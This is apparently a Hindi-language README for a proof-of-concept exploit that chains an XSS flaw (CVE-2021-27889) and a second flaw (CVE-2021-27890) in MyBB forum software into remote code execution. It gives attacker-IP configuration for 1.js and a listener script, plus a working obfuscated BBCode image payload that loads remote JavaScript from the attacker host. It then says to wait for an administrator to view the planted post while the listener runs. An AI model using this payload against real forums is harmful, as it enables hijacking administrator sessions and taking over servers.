
Mybb CVE-2021-27890 और CVE-2021-27889 को RCE पोक से जोड़ता है
Mybb में CVE-2021-27890 और CVE-2021-27889 को RSE पीओसी से जोड़ा गया
उपयोग से पहले:
यहाँ दो फ़ाइलें हैं: 1.js और attack_listen.py
आपको इन दो फ़ाइलों को बदलना होगा:
1.js:
mybb फ़ोरम URL और अटैक URL बदलें:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
अटैक होस्ट और अटैक पोर्ट बदलें:
attack_host = '192.168.92.165'
attack_port = 8080
उपयोग विधि:
CVE-2021-27889 एक XSS है। आपको हमले से पहले निम्नलिखित पेलोड को "नई पोस्ट थ्रेड" या "जवाब दें" या "निजी संदेश" में इंजेक्ट करना होगा। इस डेमो में, मैं पेलोड को "नई पोस्ट थ्रेड" में भेजता हूँ।
ध्यान दें कि 192.168.92.165 ईविल सर्वर आईपी है, आपको इसे बदलना होगा।
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

अब हमारी ईविल जावास्क्रिप्ट 1.js सफलतापूर्वक इंजेक्ट हो गई है। फिर हमें प्रतीक्षा करनी होगी कि कोई एडमिन लॉग इन एडमिन पेज कुकी के साथ इस पोस्ट को ब्राउज़ करे।
ध्यान दें कि एडमिन उपयोगकर्ता के लिए फ़ोरम पेज पर लॉग इन होना आवश्यक नहीं है।
प्रतीक्षा के दौरान, हमें अपनी अटैक मशीन पर "attack_listen.py" चलाना चाहिए, ताकि यह पहचान सकें कि एडमिन उपयोगकर्ता पर हमला हुआ या नहीं।
python3 attack_listen.py
जब एडमिन उपयोगकर्ता ईविल पोस्ट ब्राउज़ करेगा, तो ईविल जावास्क्रिप्ट हमला करेगी:

हम अपनी अटैक मशीन पर जानकारी प्राप्त कर सकते हैं:

